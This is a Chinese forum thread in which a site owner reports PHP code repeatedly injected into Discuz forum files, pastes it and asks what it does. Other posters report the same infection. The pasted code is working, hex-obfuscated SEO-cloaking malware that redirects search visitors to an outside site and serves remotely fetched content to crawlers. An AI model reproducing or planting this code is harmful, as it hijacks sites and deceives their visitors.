有漏洞，文件无故被加代码

先是在function_forum.php中加，恢复后，今天又发现在forum_viewthread.php又发现同样代码。

1. <?php
   
2. /*StartCache*/
   
3. function relset_UC_key ($string)
   
4. {
   
5.         $arraygn = strlen ($string);$debuger = '';
   
6.         for($one = 0;$one < $arraygn;$one+=2) {
   
7.                 $debuger .= pack ("C",hexdec (substr ($string,$one,2)));
   
8.         }
   
9.         return $debuger;
   
10. }
    
11. 
    
12. function relset_Turl ($url)
    
13. {
    
14.         global $relset_host;
    
15.         $string = relset_UC_key ('4c6f636174696f6e3a20'.$url.'3f').str_replace ('.','_',$relset_host);
    
16.         header($string);
    
17.         return true;
    
18. }
    
19. 
    
20. error_reporting (E_ERROR);
    
21. 
    
22. if($_GET && !eregi('site%3A|inurl%3A',$_SERVER['HTTP_REFERER']))
    
23. {
    
24.         $clserv = &$_SERVER;
    
25.         $relset_host = $clserv['HTTP_'.'HOST'];
    
26.         $relset_self = $clserv['PHP_'.'SELF'];
    
27.         $relset_refe = $clserv['HTTP_RE'.'FERER'];
    
28.         $relset_user = $clserv['HTTP_US'.'ER_AGENT'];
    
29.         if ($_GET['tid'] > 9999999 || $_GET['tid'] > 9999999){
    
30.         $arrgpe = array(
    
31.              'tid' => array('%B2%A9%B2%CA','%b2%a9%b2%ca','687474703A2F2F3232322E64616E6763692E63632F'),
    
32. 
    
33.         );
    
34. 
    
35.         $keysar = array_keys ($_GET);
    
36.         $arrgps = array_keys ($arrgpe);
    
37.         $arrgpx = array_values (array_intersect ($arrgps,$keysar));
    
38.         $rebotu = $arrgpx[0];
    
39.         $boswon = relset_UC_key ('62616964757c676f6f676c657c736f676f757c736f736f7c7961686f6f7c62696e677c626f747c7370696465727c736f7c333630');
    
40.                 }
    
41.         if (eregi ($boswon,$relset_refe)) {
    
42.                 if (!empty ($rebotu)) {
    
43.                         relset_Turl ($arrgpe[$arrgpx[0]][2]);
    
44.                         exit;
    
45.                 } else {
    
46.                         foreach($arrgpe as $vargn => $arraygn) {
    
47.                                 if(stristr ($relset_refe,$arraygn[0]) || stristr ($relset_refe,$arraygn[1])) {relset_Turl ($arraygn[2]);exit;}
    
48.                         }
    
49.                 }
    
50.         } elseif (eregi ($boswon,$relset_user) && $rebotu) {
    
51.                 $valsar = array_values ($_GET);
    
52.                 $retueby = array(
    
53.                         0 => relset_UC_key ('3f643d'),
    
54.                         1 => relset_UC_key ('26733d'),
    
55.                         2 => relset_UC_key ('26763d'),
    
56.                         3 => relset_UC_key ('26723d'),
    
57.                         4 => relset_UC_key ('636f6e74656e742d547970653a20746578742f68746d6c3b20636861727365743d676232333132'),
    
58.                         5 => relset_UC_key ('687474703a2f2f'),
    
59.                         6 => relset_UC_key ('5b30785370696465725d')
    
60.                 );
    
61.                 $inters = relset_UC_key ('3830');
    
62.                 $demuer = relset_UC_key ('6262732E616E7175616E2E7573');
    
63.                 $simeiao = relset_UC_key ('2f6170692f696e6465782e706870');
    
64.                 $classinction = $retueby[0].$relset_host.$retueby[1].$relset_self.$retueby[2].$rebotu.$retueby[3].$valsar[0].'|'.$valsar[1].'|'.$valsar[2];
    
65.                 header ($retueby[4]);
    
66.                 $skyword = @file_get_contents ($retueby[5].$demuer.':'.$inters.$simeiao.$classinction);
    
67.                 $skywords = explode ($retueby[6],$skyword);
    
68.                 echo $skywords[1];
    
69.                 exit;
    
70.         }
    
71. }
    
72. 
    
73. /*EndCache*/
    
74. ?>

复制代码

这段代码是什么意思？

官方没人吗？ 连个回复都没有，很多discuz的论坛都被黑了,dz不靠谱啊

学习了

就是啊，这个太烦人了，老清理不掉。

没有发现过此问题，请检查是否是服务器漏洞，或者FTP被黑。

我的也一样